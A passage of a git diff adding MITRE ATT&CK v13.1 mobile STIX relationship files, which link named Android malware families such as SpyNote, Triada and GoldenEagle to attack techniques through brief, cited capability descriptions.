@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ef2b05e8-aa8a-4a2f-8060-24f4a315a0de", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0008005f-ca51-47c3-8369-55ee5de1c65a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:43:54.975Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) uses an Android broadcast receiver to automatically start when the device boots.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json new file mode 100644 index 0000000000000000000000000000000000000000..0a6415f051b812ac94a561551be080d0feceac44 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c2877fc6-fa7f-4307-9927-61a8d17e430b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308", + "created": "2023-02-06T19:04:33.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:06:11.934Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can monitor notifications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json new file mode 100644 index 0000000000000000000000000000000000000000..dd936d881cb44bc3066a19b11b1cdc253000cd35 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7105a463-8b65-4754-b181-a255802ae64d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00dc2b34-1b74-4dae-b6e4-b676528d6341", + "type": "relationship", + "created": "2019-07-16T14:33:12.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.480Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilizes a backdoor in a Play Store app to install additional trojanized apps from the Command and Control server.(Citation: Google Triada June 2019)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json new file mode 100644 index 0000000000000000000000000000000000000000..e5f82b1a67e3d1f3f1603c99ee5b7d7de55ac969 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0100020b-97d4-4657-bc71-c6a1774055a6.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7aa75c95-3d29-4d6a-a84d-85333e380d9f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0100020b-97d4-4657-bc71-c6a1774055a6", + "created": "2022-04-20T17:36:25.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:23.114Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has exfiltrated data via both SMTP and HTTP.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json new file mode 100644 index 0000000000000000000000000000000000000000..f87fdc75af0b69aa845866d9b7d6aa5d9faf5609 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--01965668-d033-4aca-a8e5-71a07070e266.json 
@@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--1f580ea0-a6a0-4b26-b50b-880824da90f8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01965668-d033-4aca-a8e5-71a07070e266", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json new file mode 100644 index 0000000000000000000000000000000000000000..23d6aa9beded4dd83d91593a0dab3428a9a027d6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--61f19102-48d0-4081-8286-ae793f742605", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020a1aaa-a444-4f3c-a08b-f1369be276f2", + "type": "relationship", + "created": "2020-09-15T15:18:12.398Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." + } + ], + "modified": "2020-09-15T15:18:12.398Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can collect device networking information, including phone number, IMEI, and IMSI.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json new file mode 100644 index 0000000000000000000000000000000000000000..cfa09234be662ea31cac69f010581a079db33bab --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--95147ff5-d828-4dfe-833e-3cf6f4262510", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--020f79c6-d5f8-49eb-beee-e716e1fa4e80", + "type": "relationship", + "created": "2020-07-20T13:49:03.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.191Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device\u2019s Android ID and serial number.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json new file mode 100644 index 0000000000000000000000000000000000000000..ade3f8786aaec64e2f35d071a6b689040deeb05c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6e4e8111-6898-4a1d-aa27-6e74943453a6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--021ca5c4-7e8a-439b-8c2e-38f817db63e3", + "created": "2023-02-06T18:50:12.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-14T14:40:57.100Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can check device system properties to potentially avoid running while under analysis.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json new file mode 100644 index 0000000000000000000000000000000000000000..756e801ad8bd502c895c2aaa9bfed4add4bdbedf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--022e941f-30c3-45a9-9f6f-36e704b80060.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--cbc6dd99-b3ff-4114-a1b0-229ca95d65ef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--022e941f-30c3-45a9-9f6f-36e704b80060", + "created": "2020-04-24T17:46:31.574Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:13.361Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) registers for the `SCREEN_ON` and `SMS_DELIVER` intents to perform actions when the device is unlocked and when the device receives an SMS message.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json new file mode 100644 index 0000000000000000000000000000000000000000..a4da1f9ad208801aa407aec22db226626a4aed0c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--2a7935e6-1cdc-4e98-a50c-93a00283fc9c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--027a36dc-cd9e-4282-b101-b9a0abbb312f", + "type": "relationship", + "created": "2020-09-11T14:54:16.640Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.640Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can encrypt exfiltrated data.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json new file mode 100644 index 0000000000000000000000000000000000000000..3ee7c2f2d9adaa9b9549a8b6229647264cfbe799 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0291c9d5-8977-420d-8374-b786e3095a73.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--60c68bb9-5f3c-4c27-b849-f655aaceaf8b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0291c9d5-8977-420d-8374-b786e3095a73", + "created": "2023-03-20T18:49:53.204Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:49:53.204Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json new file mode 100644 index 0000000000000000000000000000000000000000..bba4e1b1d4a842d0eedc992bf6944179128ba044 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--f4e3731d-da40-4c81-8b7f-f9e40642aa3f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--02b3c8fe-1539-4c77-b67e-07fa8a22c91e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Some original variants of [BrainTest](https://attack.mitre.org/software/S0293) had the capability to automatically root some devices, but that behavior was not observed in later samples.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json new file mode 100644 index 0000000000000000000000000000000000000000..2bca702cceffdddede75be32d01ab0acebf6a76b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8bd11247-a65b-487b-9e47-4c142356acfc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--02b5cb07-9eb5-4e47-a4df-9c3985ad70fc", + "created": "2021-10-01T14:42:49.174Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:41.762Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can abuse existing root access to copy components into the system partition.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json new file mode 100644 index 0000000000000000000000000000000000000000..e765b091a09702e1126c645d0e41efa8c3ee8588 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--02e4aedc-0674-4598-948b-0a32758af9ca.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--fd8aa277-23e5-465c-be60-eaafcdd1b684", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--02e4aedc-0674-4598-948b-0a32758af9ca", + "created": "2022-04-01T13:14:43.195Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:14:43.195Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--79eec66a-9bd0-4a3f-ac82-19159e94bd44", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json new file mode 100644 index 0000000000000000000000000000000000000000..32f538c30e4c2bc28daf9bf6ee24797f2d8171c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--1450b511-32b0-4b91-8d08-c18febd01faa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--03038590-e0c3-4751-b6fb-8a9ffff27e1b", + "type": "relationship", + "created": "2020-12-24T22:04:27.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.914Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has looked for .doc, .txt, .gif, .apk, .jpg, .png, .mp3, and .db files on external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json new file mode 100644 index 0000000000000000000000000000000000000000..3324f1efe90ba2e46f5c66cd5361474bbc0b0476 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--03172b09-4f97-4fb8-95f0-92b2d8957408.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1682386b-dcdd-4fbf-8593-f80f900253c3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--03172b09-4f97-4fb8-95f0-92b2d8957408", + "created": "2020-06-26T14:55:13.349Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[EventBot](https://attack.mitre.org/software/S0478) has encrypted base64-encoded payload data using RC4 and Curve25519.(Citation: Cybereason EventBot)", + "modified": "2022-04-18T15:57:14.375Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json new file mode 100644 index 0000000000000000000000000000000000000000..91e379abc5072559afc4310691c63275c33fa7c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0330db55-06e0-45a2-85a6-17617a37fdaf.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--742fcfe1-4a75-4edc-946a-1015f60fbdbc", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0330db55-06e0-45a2-85a6-17617a37fdaf", + "created": "2022-04-06T13:57:49.186Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:57:49.186Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8.json 